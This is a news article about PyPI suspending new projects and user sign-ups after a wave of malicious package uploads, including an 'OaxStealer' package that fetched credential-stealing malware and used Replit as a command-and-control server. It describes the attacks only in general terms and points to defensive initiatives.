The PyPI (Python Package Index) team has temporarily suspended new projects and users on their platform due to malicious activity.
This surge in malicious activity aligns with a larger trend observed across several open-source registries in recent months. Notably, incidents such as the flood of malicious packages on the NPM JavaScript package manager and a similar attack on the Nuget package manager last year, involving over 140,000 malicious packages, have highlighted the vulnerability of these platforms.
PyPI experienced a sudden spike in package publications last week. For example, a threat actor exploited three user accounts to publish numerous malicious packages, including one called “OaxStealer.” This package contained encoded code that, when executed, downloaded a second piece of malware from a legitimate service called “replit.com.”
The downloaded malware was designed to steal sensitive information from victims, including credentials, file names, and screenshots.
Notably, the attackers utilised the legitimate SaaS platform Replit as a command-and-control (C2) server to collect the stolen data.
Investigating the attacker’s account, researchers from application security testing firm Checkmarx discovered the complete code of the C2 server and the .exe files used in the attack.
This incident serves as a reminder that the abuse of open-source registries is not limited to PyPI alone but poses a broader threat to the entire ecosystem. It is crucial to shift the focus from solely detecting attacks to identifying the attackers behind these malicious activities.
Checkmarx notes that understanding the tactics, techniques, and procedures (TTPs) used by the attackers is essential to defend against such attacks effectively.
To ensure the safety of the open-source ecosystem, it is imperative that the community invests in developing new infrastructure and sharing attack data. Supporting the efforts of platforms like PyPI is vital for the thriving of the open-source ecosystem.
Developers and organisations seeking secure frameworks are encouraged to explore initiatives like OpenSSF S2C2F and community projects like the Overlay extension that help developers to evaluate open source packages before picking them.
Relevant: Clipper malware found in over 451 PyPI packages
Want to learn more about cybersecurity and the cloud from industry leaders? Check out Cyber Security & Cloud Expo taking place in Amsterdam, California, and London.
Explore other upcoming enterprise technology events and webinars powered by TechForge here.